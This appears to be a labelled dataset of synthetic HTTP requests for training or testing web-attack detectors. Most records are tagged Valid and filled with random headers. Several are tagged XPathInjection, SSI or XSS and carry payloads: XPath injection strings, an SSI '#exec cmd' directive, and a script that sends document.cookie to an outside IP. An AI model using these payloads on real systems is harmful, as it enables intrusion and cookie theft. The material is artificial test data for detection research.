GET /i2@yRhnbgc4EzWUrpP/anhhI/txj_/ksuleEd/iLWojJKTVn/tasna.tiff?mniobieaieozY=073026&easevdj=lib4e1u&e9=9c+tyaiTprocessing-instructionpassthru+%24%3C5iD&Etelkdt2Ieeacle=74++or++++1%3C+++ag1%2Ft%2FOii0ec%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D68%5D++or+++72030%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&76rmbuocNet=8973523653&enurhacrlc8imoI=dhY%298olt+di%5Driq%24c&OKZexec7object9=disesehvelg8mo HTTP/1.0
Host: www.rsRo4tlnc.be
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 146.50.160.76
Cookie: EOtrn7eO8fh=alirtgdcrUiSdOtzt;qVXw=583;a8QCu806eval=acj;cbssl45vnyUw=eOXgerv3__;hrticq1=7383581;nmaecsrCnihas6n=t26i8nf8v8tecmde)~6
Cookie2: $Version="9"
Date: Thu, 27 Oct 05 20:15:41 GMT
ETag: "gC0@.8IijW.B2UanuLnC"
Expect: ee0n=eems
From: noamdhg@Dea3h8.biz
If-Modified-Since: Tue, 01 Feb 05 04:39:17 UTC
If-Unmodified-Since: Wed, 15 Jul 09 21:39:37 GMT
If-Match: "61Me-zYyR-KuTQyv_"
If-None-Match: *
If-Range: Wed, 04 Oct 06 13:12:19 UTC
Max-Forwards: 412
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Basic ZVJhcnJsQTppc3Blbw==
Authorization: tieT iapre=tartt
Range: 929-812,-37,2-
Referer: /tsnnrQ/watSxm/qqkrteel.gif
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/5.9 (Machintosh; U; Mac OS X 6.5; dL-eo; rv:6.5.2) Gecko/49294307
UA-CPU: MIPS
UA-Disp: 662,518,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 172x6984
Via: FTP/7.1 32.26.226.202:7
Transfer-Encoding: compress
Upgrade: iaungA/1.1, Ibh/8.2, greil/3.0, n3e/0.8
Warning: 205 www.ttrce.htm "Tia5umnten" 
X-Forwarded-For: 233.168.85.19
X-Serial-Number: 684744620
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49819
Start - Id: 20532
class: Valid
GET /oBJGX6/aBmi3ioNj7JT/kFnI/khro1b/0u/witrin6tzliSliaphl5/uWpO9uC/wZ/r7RazS5var/6YjTIXxFQShH/tinB/t3G.htm?dtat4otldo=88 HTTP/1.1
Host: www.ae2efs.uk
Connection: close
Accept: text/*, image/*, application/*;q=0.0
Accept-Charset: windows-1252
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 109.69.212.119
Cookie: gMTSbin23= oag;rfee4ern=40313;Irtynelxshevfwt=3\eg2eae%o
Cookie2: $Version="002"
Date: Fri, 26 Nov 04 04:25:20 CET
ETag: W/"9qDaWd0xOniudY@1"
Expect: 100-continue
From: m4Ilxlpt@rise1wePl.it
If-Modified-Since: Sun, 21 Sep 08 01:59:25 CET
If-Unmodified-Since: Sun, 10 Jul 05 04:47:09 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3574
MIME-Version: 6.1
Pragma: Ew9ltdnN='ad'
Proxy-Authorization: NTLM bkVoSWFhbXRWcjlrZXlyaWVlbGdobG9lckl0ZW43ZTFzZWxlcjdmM2lob2l2ZXBP
Authorization: Digest opaque="wrot0"
Range: 9-471
Referer: http://www.sneosttt.de/e17wot/ghmHuWsv/gt8Trf2w.css
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/6.7 (Windows; U; WinNT 0.3; yl-su; rv:0.5.5) Gecko/27238851
UA-CPU: StrongARM
UA-Disp: 9823,4223,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 5447x066
Via: FTP/6.7 98.221.106.115:62945, HTTP/2.4 30.182.108.209, 4.2 www.nsah.html
Transfer-Encoding: identity
Upgrade: aOnbin/5.3, cUojlc/5.1
Warning: 151 146.124.39.49:89 "lAPnn" "Sat, 02 Jul 05 07:47:23 GMT"
X-Forwarded-For: 55.186.171.144
X-Serial-Number: 48113953855
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20532
Start - Id: 26493
class: Valid
GET /3B2F/phomemetahtacces_Wwp-/loeeWNpo.aspx? HTTP/1.0
Host: www.oltw.biz
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: osek8-soaowi;q=0.5, ixlwnbsu-e
Cache-Control: no-transform
Client-ip: 196.239.181.136
Cookie: 70httpspasswd9=;tlacceptecho;eZhet=2Yx;p3BdeeSro=hB3s
Cookie2: $Version="0"
Date: Mon, 15 Jun 09 12:52:20 GMT
ETag: W/"kpvX@IInxSxRK4Ag9@d"
Expect: imeiyeat=hnewk
From: r2Sewei@iiwioe8s.st
If-Modified-Since: Fri, 19 Feb 10 11:06:24 UTC
If-Unmodified-Since: Wed, 19 Mar 08 01:26:52 UTC
If-Match: *
If-None-Match: "C-j8_jvNUUaziA1LGTwu"
If-Range: Fri, 23 Jun 06 10:39:30 GMT
Max-Forwards: 0246
MIME-Version: 5.1
Pragma: t8=ceTib
Proxy-Authorization: Basic OGh0bndTbjpvZHI3clNz
Authorization: Digest uri=http://niisrsn.be/jwA4lst/xdensa/dcs1iat/rehi.bin
Range: -394,77057-
Referer: /dosa/gOna6i/l6eor/sndd/9etvsnr.nsf
TE: deflate,deflate;q=0.3
Trailer: Proxy-Authorization
User-Agent: mynAHegsg8dn
UA-CPU: StrongARM
UA-Disp: 9620,0046,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 701x092
Via: iynthc/7.9 95.61.55.90:44050, 7.2 197.182.194.47, 6.0 92.175.122.204
Transfer-Encoding: omTn
Upgrade: e7rni/4.8, eefgnj/9.6, ensu/8.5, oOfs/2.8
Warning: 294 240.99.80.175 "5vdbnr43n" "Sat, 21 Jun 08 18:51:20 UTC"
X-Forwarded-For: 135.109.117.133
X-Serial-Number: 7639559480776
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26493
Start - Id: 50078
class: XPathInjection
PUT /kee1nrmmnFFn/hDAw9qE1.sh? HTTP/1.0
Content-Length: 242
Content-Language: brhhd,tlsexbT,8or3GeD8
Content-Encoding: deflate
Content-Location: /nmai/sai595o.pdf
Content-MD5: RU1hbmc4ZWl1dWxnZUhIcw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 20 Sep 06 20:23:07 CET
Last-Modified: Wed, 12 Apr 06 14:04:29 UTC
Host: 9.50.229.62
Connection: o5et3
Accept: application/*, image/*;q=0.9
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: adc-tbTmi
Cache-Control: no-store
Client-ip: 176.167.93.178
Cookie: tccszn=hhB' or     1<   of/ior/iawee/child::text()[position()=89]    or  'rottfe'  =    '
Cookie2: $Version="8"
Date: Sat, 06 Dec 08 12:08:38 UTC
ETag: W/"YvBDBo2za1toxnc75kU"
If-Modified-Since: Sat, 14 Jun 08 09:50:44 GMT
If-Unmodified-Since: Tue, 01 Sep 09 09:18:23 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 29 Oct 04 04:35:06 CET
Max-Forwards: 23
MIME-Version: 1.8
Pragma: rrzxOgma=aesoRyhk
Authorization: Basic Z3Z4dXdtZTp1dGx1TTE=
Referer: /hant/nnt7z/bhsiw9mj/tnerngf6/2aurh.dll
TE: gzip;q=0.8,trailers,trailers
User-Agent: Mozilla/6.4 (compatible; tjeiw6; WinNT; fTinrs; 7zrsos; saoRtes)
UA-Color: color8
Via: 1.6 53.206.25.64:22353, 3.6 113.28.27.228
Transfer-Encoding: deflate
Warning: 280 231.16.57.114 "heey2eoaoen" "Tue, 20 Oct 09 23:24:02 UTC"
X-Forwarded-For: 111.165.36.41
----: ---------------------------------------------

1le3eg=tform&EP3axSSBcreplaceM=ostmple&nti=cAime&wfptnmas4gq5inf=T70ae%5rcf8 &g6ftriiEi=smsEmqc%sCrrxh&nanetittn9oeupa=opzEM7ljn&wyse=bTHCaScEa|EsQ &otJnmto=/toagSin)ysreestr2d&ilinkR_include3n=p &ejer=hbiE0trtaErC9n&iws9a=tperlouna

End - Id: 50078
Start - Id: 1217
class: Valid
GET /imS2jSs1mpG56G/z5KFl3aKycs@S/fF4i.8M7NvYJiFwr8_Qp/pM-zG/ta8rZage5aeteei9On/hnhbuRo@lTqFe_t0/pen/s6Zqe@S71.cgi?aF=ufhntltlts4cuteoor HTTP/1.0
Host: 94.137.233.41:80
Connection: keep-alive
Accept: image/*, application/*
Accept-Charset: windows-1255;q=0.4, x-mac-cyrillic;q=0.2, big5, iso-8859-9
Accept-Encoding: 
Accept-Language: oaooge-No4htb;q=0.4, igai9p-s;q=0.7
Cache-Control: max-stale
Client-ip: 45.31.150.41
Cookie: Ra8Nysoenx=kiihuhbl
Cookie2: $Version="4"
Date: Fri, 15 Aug 08 14:54:23 CET
ETag: W/"O5Oa9vshu3oH7Xtgc"
Expect: 100-continue
From: wumeksF@nvKhs3.net
If-Modified-Since: Thu, 25 May 06 13:57:09 UTC
If-Unmodified-Since: Tue, 04 Mar 08 05:31:31 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 08 Sep 09 13:18:26 CET
Max-Forwards: 75
MIME-Version: 6.8
Pragma: 42ewnwwN='t'
Proxy-Authorization: Digest response="BcAb5E682BA76B5c0F0049F90aCF4F97"
Authorization: Digest qop=zssro1tn
Range: -709
Referer: http://www.ebtgne.be/nLso.txt
TE: gzip,trailers
Trailer: If-Unmodified-Since
User-Agent: Tfcrdtoel2vnr
UA-CPU: PowerPC
UA-Disp: 3549,296,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 6040x9780
Via: HTTP/1.3 193.181.97.127
Transfer-Encoding: compress
Upgrade: Tcnya/6.9, 3OlS9/8.0
Warning: 773 137.202.170.148 "wemeb1trtts" "Tue, 16 Oct 07 10:58:18 UTC"
X-Forwarded-For: 161.167.26.165
X-Serial-Number: 326327
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1217
Start - Id: 31840
class: Valid
GET /4dsspeaIgcvweanii/flatSe4x754o9sso9WJf/tnRyj4sx._bN/9x3PT@6l.jsp? HTTP/1.0
Host: www.enyeah.net
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.3
Accept-Encoding: compress, identity
Accept-Language: njh9-eoioa, ne-tooT;q=0.5, yn5rFPl-qsso;q=0.4, odm5df-tmr4e;q=0.2, ienpll-loial3a
Cache-Control: min-fresh=39
Client-ip: 111.91.155.175
Cookie: MNep=9973692
Cookie2: $Version="944"
Date: Tue, 04 May 10 21:27:34 GMT
ETag: W/"gde8Dk70UHJfStlf"
Expect: 100-continue
From: tte0c@9tOsemgp.be
If-Modified-Since: Mon, 29 Mar 04 06:12:32 UTC
If-Unmodified-Since: Wed, 09 Aug 06 04:20:04 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 16 Jan 05 14:40:40 UTC
Max-Forwards: 1578
MIME-Version: 4.6
Pragma: t=sTyarbyo
Proxy-Authorization: NTLM TzB5dXJPcklpZG5lZXR0YzJ0OXczZXNucTh0bXRhZW5Rcm5tYTJ0ZHN0eHVpaQ==
Authorization: Thtifc rinsbhra=atiD
Range: -86
Referer: /tL7t/ruet/mrwuio.mpeg
TE: gzip;q=0.4
Trailer: Trailer
User-Agent: soHk/2.2.7.0.8
UA-CPU: MIPS
UA-Disp: 753,4459,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 2241x014
Via: 3.4 24.177.238.90
Transfer-Encoding: gzip
Upgrade: emhps/3.5, Steh/4.0, aieted/4.2, iro9te/2.8, are/6.4
Warning: 195 19.136.88.173 "i5lytaiwejOlo" 
X-Forwarded-For: 124.247.211.206
X-Serial-Number: 69375200108238652611
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31840
Start - Id: 14744
class: Valid
GET /eval4AMgqohPg8mc41/9skstdinEbgsoundzajtmpxhe.css? HTTP/1.0
Host: 24.30.137.197:80
Connection: keep-alive
Accept: image/jpeg, video/mpeg, application/x-tar;q=0.9
Accept-Charset: iso-10646-ucs-2;q=0.0, iso-8859-7, x-mac-roman, windows-1257;q=0.3, x-mac-icelandic;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=01478
Client-ip: 149.211.102.91
Cookie: mSbXhtaccesfu=n';ulkuyreisc=omOUtalUplpeeX4;ocnn0h=aKV7m-;zrtKruJmejth=gJ79dGSrr;choo=i8dye;elxvaebanceczp=tV
Cookie2: $Version="8"
Date: Mon, 13 Jun 05 04:13:35 CET
ETag: W/"vtXpvnOSMRy_3ihtR"
Expect: 100-continue
From: 2fha@Uyuktyytdj.de
If-Modified-Since: Tue, 06 Jan 04 13:04:12 GMT
If-Unmodified-Since: Wed, 31 May 06 12:57:52 CET
If-Match: "Ep9fgipx7C_n52Jifd"
If-None-Match: "HHI_4w_-W6jRhW1mvCe2"
If-Range: *
Max-Forwards: 561
MIME-Version: 4.5
Pragma: eebRsnn=l
Proxy-Authorization: el3ew eon38=myylbi
Authorization: ainqe igyuaoa=7osDF0
Range: 444847-,76-,3-393
Referer: http://gpcds.fr/tg9ei/ilnaeo2/wecn/tinthaoa/Yg4eec.php
TE: chunked;q=0.5,gzip;q=0.4
Trailer: Date
User-Agent: ip.KNkOh http://www.e7s9ehCe.it
UA-CPU: StrongARM
UA-Disp: 6549,336,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 255x347
Via: n4as/5.0 www.amon.tiff, 1.0 250.92.180.40
Transfer-Encoding: identity
Upgrade: fja/3.9, pter/0.6, uolcsa/0.0, towid/1.6, ehr/7.2
Warning: 491 www.jeuiAh5t.htm "wjeodstn" "Wed, 27 May 09 09:21:52 GMT"
X-Forwarded-For: 99.254.129.225
X-Serial-Number: 33725360786498
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 14744
Start - Id: 11848
class: Valid
GET /gjearjdne/r3hO5xLS4A4_iMvr7rj/a24rc1B.php4? HTTP/1.0
Host: 189.183.80.233
Connection: dtoCei
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: compress, identity, deflate;q=0.3, identity;q=0.0, gzip
Accept-Language: *;q=0.4
Cache-Control: max-age=23
Client-ip: 18.97.57.49
Cookie: mh=+Et>u1=|;o:nph-/;nEYIT-7=2364835;13YHoUT=atucr;ns=asipmztg;lrvuuaKe=y6as5fo7formcnatdur+sbexec;ftiE=~0mocha0r
Cookie2: $Version="31"
Date: Tue, 15 Apr 08 12:41:00 CET
ETag: "FZwK.YcjjgnIG-@p"
Expect: 100-continue
From: tettqfmr@aac7ikiH.biz
If-Modified-Since: Fri, 07 Jul 06 19:14:35 GMT
If-Unmodified-Since: Sun, 10 Apr 05 17:04:31 GMT
If-Match: "g-GIX1Nj04..h.GFN0Ax"
If-None-Match: *
If-Range: "JAl2h8dgjsFhhZeKR54s"
Max-Forwards: 9
MIME-Version: 2.2
Pragma: cirmmt7=es
Proxy-Authorization: Digest uri=/sde0s9/ohlmju.mpeg
Authorization: Digest username="nmetlet"
Range: 58-5013
Referer: /qzbqe/ImsBdv.jsp
TE: chunked,gzip,trailers
Trailer: Date
User-Agent: Mozilla/2.7 (compatible; 7ae6e; Windows NT; ersiaenu)
UA-CPU: x86
UA-Disp: 032,592,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 8781x277
Via: 7.5 202.57.61.164:8685
Transfer-Encoding: identity
Upgrade: qeona/2.2, e3aae/0.6
Warning: 315 www.oatloe.css "eSpaaytaurstt" "Thu, 12 Mar 09 20:27:38 UTC"
X-Forwarded-For: 154.0.65.175
X-Serial-Number: 3151909596780283547
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11848
Start - Id: 48603
class: XPathInjection
POST /gokMien/oyD-bb8D.2Y6JQgtoP6/abomrni/NtCFhAm0KIrCt.T/aw/M-LzslsZ7tmpNmbZLb/hQbhrT6BZ4FDfYAqDOk/shP4qCRFXE4UOwR0VRtf/Fui/b5wl.jsp? HTTP/1.0
Content-Length: 329
Content-Language: gw
Content-Encoding: deflate
Content-Location: http://www.missA.ch/IsEDraee/seiiaiss/sna0.asmx
Content-MD5: ZWlycHdnM2FIdG5hNHN0MQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 15 Aug 09 16:00:58 UTC
Last-Modified: Thu, 26 Feb 09 21:59:10 CET
Host: 254.255.142.53:80
Connection: keep-alive
Accept: image/jpeg
Accept-Charset: *
Accept-Encoding: identity, deflate, gzip
Accept-Language: h-3eezy;q=0.2, obFeinEt-meE7t
Cache-Control: only-if-cached
Client-ip: 58.151.109.14
Cookie: iniaih=1;C5XPn2.=364953572;Sdoc9i2d=efadmintp;ayzrAtd=0462314207
Cookie2: $Version="7"
Date: Sat, 21 Jan 06 04:50:24 GMT
ETag: W/"8nwUpGX1@vrk.uB0bqTM"
Expect: 100-continue
From: aUfef@ct1nr.cz
If-Modified-Since: Mon, 03 Jan 05 21:47:28 CET
If-Unmodified-Since: Sat, 26 Apr 08 09:27:27 CET
If-Match: "Mm83On1z6kdrQw3g0D"
If-None-Match: "iWTwWoQsVMvsBqR3"
If-Range: "eK7x7COBp1sq9sCZ"
Max-Forwards: 481
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: Basic TWx1Zzpic3JvZWg=
Authorization: ndnhp laeasbte=tcyn
Range: 3-574
Referer: http://www.etiuiu.com/eejmV3v/abh5s9.php
TE: deflate;q=0.4
Trailer: Authorization
User-Agent: Mozilla/7.4 (Windows; U; Win 9x 9.3; c1-Sy; rv:3.4.6) Gecko/57459314
UA-CPU: Sparc
UA-Disp: 5404,3137,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 853x5228
Via: dmnaa/6.2 www.eaauhil.html, mny/8.0 241.58.186.24
Transfer-Encoding: tFultt
Upgrade: nosb/0.4, m6epm/3.8, n3lo/2.7
Warning: 912 63.37.169.211 "zae8nine1efbsarunme" "Fri, 13 Jun 08 08:02:48 CET"
X-Forwarded-For: 90.231.108.36
X-Serial-Number: 4557952
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

aeiynae=74209987&ihe8rao=EenhetE9ltTpuaUt&igses=wltv&8ynhzrnnoo=ahttpd&c1trt=rfromn&mqnroa8lh=77&aao2nsepsot=OchilddAeod&hma8iie8WadmS=gjopa99ii&qt9mfqei=4ot' or tlu/ry/child::node()[processing-instruction()=5] or    '2mr2t'    = '&qcat15_LhttpSXO=H&es==ns <wmuaa uaf-os&ancetAiadoosSs=3138150

End - Id: 48603
Start - Id: 40325
class: SSI
GET /oLuishOugkaU/iJPOhB1Vc14E@m.H/nHZJj9/oTjlH7xHdEvqX@/na.js?SdetmerleetidsL=%3C%21--+++%23exec+++cmd%3D%22c%3A%5Cprogra%7E1%5Cypol%5Ctdeops%5Cuoetye.exe+++d%3A%5Cnwewdntn%5Cwww.lireli.org%5Ceeeel1%5Cdatabase.mdb+%2Fx+++exporttofoxpro%22--%3E&nodr5scMtasa=eval%3Fef%24asystemt&ayq1itnfvs6sh=eMfKLD-Z0a HTTP/1.1
Host: 174.88.2.83
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.8
Accept-Encoding: deflate;q=0.0, compress
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 239.88.55.52
Cookie: rcSdiA0lq=(n?rraeSte;rmhomeY2Ph5VhavingCR=42832;lypiu=rY86x5
Cookie2: $Version="171"
Date: Sun, 26 Jun 05 06:54:04 CET
ETag: W/"3aL2s0eosA_dmr_vq"
Expect: z0lexn8
From: 5sd2@aayBcy.de
If-Modified-Since: Fri, 25 Jan 08 23:31:17 UTC
If-Unmodified-Since: Thu, 10 Feb 05 05:28:10 GMT
If-Match: *
If-None-Match: *
If-Range: "uEH-ZYdFlT4d-sgDc"
Max-Forwards: 98
MIME-Version: 0.0
Pragma: t0dt4oA='rclse'
Proxy-Authorization: intehp 4edI=sr6n1ysd
Authorization: Basic YWVlZDpBZG53
Range: -2115,0045-233,-51
Referer: /xietagt/lmnbes/fuepltiz/wenso.php
TE: trailers,gzip;q=0.2
Trailer: If-None-Match
User-Agent: Mozilla/6.9 (X11; U; SunOS sun4u 5.2; eg-er; rv:3.7.6) Gecko/36128733
UA-CPU: 68000
UA-Disp: 996,846,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 8587x911
Via: 9.5 www.amWanad.html, 2.0 31.197.128.187:7, eNtc/4.0 www.jthliiEh.htm
Transfer-Encoding: identity
Upgrade: aTEi/5.9
Warning: 196 2.26.22.3:993 "ye78torehxsveoUeewSd" 
X-Forwarded-For: 114.213.56.41
X-Serial-Number: 475557970524
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 40325
Start - Id: 46783
class: XSS
PUT /n.P@Bn6MVvRi/amzQAZ@xWNmeta@vW/rnecooae/FSsaauEAoihtnGuha/upGA.D8J/zct/6Jreplace-DJO.swf? HTTP/1.0
Content-Length: 279
Content-Language: aR
Content-Encoding: compress
Content-Location: http://www.aerr.be/sndottr/rsL9rnel/E7pesmn6.cfm
Content-MD5: em0xdHBuZGNoeXJoZWVldA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 17 May 05 24:01:53 CET
Last-Modified: Fri, 22 Jun 07 07:22:57 GMT
Host: 77.173.97.250
Connection: close
Accept: */*
Accept-Charset: utf-7;q=0.3
Accept-Encoding: *;q=0.8
Accept-Language: yni7t-tas;q=0.0, e-seih;q=0.4, a-rxotiWe8
Cache-Control: pleAe=Imi
Client-ip: 251.85.125.254
Cookie: etidl=stylehtn?yrjef1Do]najg ;dn=aZnltupdate-;2dwoapmnu6at=in?ii;NSd4osI4weREk=rwnnlAatnecjueo7is;fablu=tjbodydT07d/rt;hfrfrcnoacU0t=ndsock_streama@nsstT4ut
Cookie2: $Version="999"
Date: Wed, 13 Jan 10 02:18:24 CET
ETag: "OrrJjm8kUjw1OpzMA"
Expect: 100-continue
From: fnwte@lpuewgs.de
If-Modified-Since: Sun, 03 Dec 06 17:17:08 GMT
If-Unmodified-Since: Wed, 15 Dec 04 18:00:22 GMT
If-Match: *
If-None-Match: "Vt60Asb7ZcDmgpveNk"
If-Range: "QfKIttdW1bIcGTA-4LN"
Max-Forwards: 885
MIME-Version: 7.2
Pragma: tAZewos='lstla'
Proxy-Authorization: sdnda be5npAfd=Esnrrha
Authorization: NTLM aWNlanAwbWpzcGplYWl1dGU1cnRoZmhuZGVzNUVBYnJwZG5lZTZmbVRzZW5uaA==
Range: 462-
Referer: http://ahsteg.net/aG4C9/tDrhhnk/stquos.swf
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/2.2 (Machintosh; U; Mac OS X 7.8; wr-ra; rv:5.7.0) Gecko/82254657
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 818x5674
Via: 4.2 95.239.189.82, eneyo/9.0 181.234.52.117
Transfer-Encoding: gzip
Upgrade: uugt9t/7.7, bihs/8.6, ei8Or/1.6, cnflaa/4.8, 1yu/6.0
Warning: 061 205.79.84.252 "trdaeY" "Tue, 09 Nov 04 20:27:34 CET"
X-Forwarded-For: 124.216.57.225
X-Serial-Number: 80684101
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

iyztehAddokNnqt=fPM&cdSY=bHkRKVtzolw8&updatecopyS_RyZHmf=eperlTtengrm;rtutE&fonlttpd8fwb9=<!-- -- --><script>[window.open('http://205.240.95.51/et.asmx'+document.cookie);]</script><!-- -- -->&dxev=TewstHaga2sigs&h1gan5nDh=g5uEIm0_3

End - Id: 46783
Start - Id: 18459
class: Valid
GET /sw9FnaQWRae/zixwagkdAeheeri/rn0sdmuEfmfHosnuwBya/hgokGy-litFsy8Zi2r4/wswnytatn8re6z2/divw@connecto0sISl_0cmX/945ewJsco/dtdeeOTm/h4mv.jpg?aenc5=160110&9C7.6copy3Pcopy=saorap&zrkUa3bhhTobptl=ghtaccesnn7aHrracbaii&i3s2dtedeneOs=optror&vnrhkjFolt1ytCe=58468772&toynet=eM1 HTTP/1.1
Host: 25.250.190.146
Connection: keep-alive
Accept: text/plain, audio/x-wav;q=0.0
Accept-Charset: x-mac-icelandic, euc-jp;q=0.2, x-mac-greek
Accept-Encoding: deflate, deflate;q=0.1
Accept-Language: *
Cache-Control: max-age=89252
Client-ip: 112.170.172.201
Cookie: mnornyoayndt8=scTE6;ahcea2ui7a=462;5srk9yuett=A3;6hjYoOhki8r=shutdowninrfea'or(mlds;_.PPow=b_Pn5qQsOE;dttNt=3803
Cookie2: $Version="4"
Date: Mon, 15 Feb 10 15:59:40 CET
ETag: W/"xrVeM_DsdLGIeOWkDNiQ"
Expect: 100-continue
From: stiq@titznIesy.de
If-Modified-Since: Sun, 27 Jun 04 07:11:29 CET
If-Unmodified-Since: Thu, 25 Jun 09 06:06:41 CET
If-Match: *
If-None-Match: *
If-Range: "rvqFv15fdwTbnUGdz"
Max-Forwards: 223
MIME-Version: 3.8
Pragma: 8Nratugt='twfe'
Proxy-Authorization: mdtspE NmaFtM=lagctp
Authorization: Digest realm
Range: 4-11,-84925,438-
Referer: http://www.taosSzen.uk/tR5hc/otoenbcy/roeeaNn.doc
TE: trailers
Trailer: Via
User-Agent: Mozilla/4.3 (X11; U; Solaris 3.7; i5-ht; rv:8.8.1) Gecko/80765101
UA-CPU: PowerPC
UA-Disp: 454,2139,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 934x751
Via: 1.7 3.234.239.159, oUd/8.0 209.68.168.190:1662
Transfer-Encoding: gre0
Upgrade: emlqe/4.7, 0ijpy/5.5, 2ee/6.9
Warning: 975 www.T3nto.html "tmezsAhMh3o5uamnt0or" 
X-Forwarded-For: 110.33.123.65
X-Serial-Number: 25635510975973984373
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18459
Start - Id: 49252
class: XPathInjection
GET /jai7tyubtnonnbMm7v/n.vP/ggwNBO/mV3gAYU0ygy5fB4ZWeJZ/Ranncbzionae/ainmtRnui/i7H_npVLQ57QflSA/oN8l9k3XwKbT8MV2svW/hor/nO-RbV-@0sjwYHKoZO.aspx?4Wtseete76=nxv&atledtPep=d%2FRde6n%2Fwu%2Fchild%3A%3Anode%28%29%5B+position%28%29%3D516%5D+++++%7C+++bes%2Flin%2Fy1e%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D605%5D+++++or+++%27tie%27+%3D++++%27&iapt6iame=jaxntR%2B%3ABua&kAGEi=2rb&gbtt02l0g2id=28&ln3ter=tgsts5blnnbgsoundl5kaebr HTTP/1.0
Host: www.otch.uk:80
Connection: close
Accept: video/*, audio/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: max-stale
Client-ip: 247.83.20.197
Cookie: k4rdkat=cseaWReumt
Cookie2: $Version="1"
Date: Wed, 22 Apr 09 03:35:25 UTC
ETag: "erUlUONCohcJ0qSw"
Expect: 100-continue
From: lqie@4vraituc.com
If-Modified-Since: Wed, 26 Aug 09 18:04:51 GMT
If-Unmodified-Since: Thu, 22 Sep 05 14:28:41 GMT
If-Match: "tZXkh0sCyFSDPr84vg"
If-None-Match: *
If-Range: Wed, 25 Oct 06 07:43:47 UTC
Max-Forwards: 0
MIME-Version: 2.0
Pragma: ibgsvkee=n
Proxy-Authorization: Digest nonce
Authorization: Digest uri=/orts/et6ah.tar
Range: 560-83908
Referer: http://www.reeandh.cz/gigs/y0rk.cgi
TE: deflate,gzip,deflate
Trailer: TE
User-Agent: Mozilla/3.7 (compatible; Konqueror/1.1; WinNT; huea0oecr8)
UA-CPU: StrongARM
UA-Disp: 2447,4165,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 666x0440
Via: 0.7 129.215.82.73
Transfer-Encoding: compress
Upgrade: 7sfngt/9.6, ace6m/0.4, rraab8/8.8, ewau/0.8, 6eest/4.1
Warning: 668 www.ijuweeor.jpg "ywtodEgcana" "Mon, 30 Jun 08 19:43:35 UTC"
X-Forwarded-For: 199.200.159.0
X-Serial-Number: 15070707581939695
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49252
Start - Id: 23354
class: Valid
GET /cemzue-dRkXK/dyhhRczntxtdeiulefi/5o95H/cdiwSu/a-QsntHZM7P7xCwQk_M/ni9tz8lei2rupe/RYAN1s7/tB/r-kJf0MG/i7ZzDrt/eFcKx3wcX4r5lqVWjA/a6exddtjaoOentttRit.php? HTTP/1.0
Host: 105.191.71.127
Connection: close
Accept: video/mpeg
Accept-Charset: *
Accept-Encoding: 
Accept-Language: i-ecpf;q=0.8, mkie-m1
Cache-Control: only-if-cached
Client-ip: 253.173.161.120
Cookie: lcwc=ynygtE in;orhezoturgr=tmB;eeAsctbw=357845;VbodtpeeCgt=i8gwbayux;rece9lwa=soae
Cookie2: $Version="5"
Date: Sat, 12 Jul 08 15:38:50 CET
ETag: W/"8c4NeMXqwo.nqdJ"
Expect: 100-continue
From: on7na@eoumlrnhbp.com
If-Modified-Since: Sun, 12 Jul 09 05:37:11 UTC
If-Unmodified-Since: Tue, 20 Dec 05 11:26:53 GMT
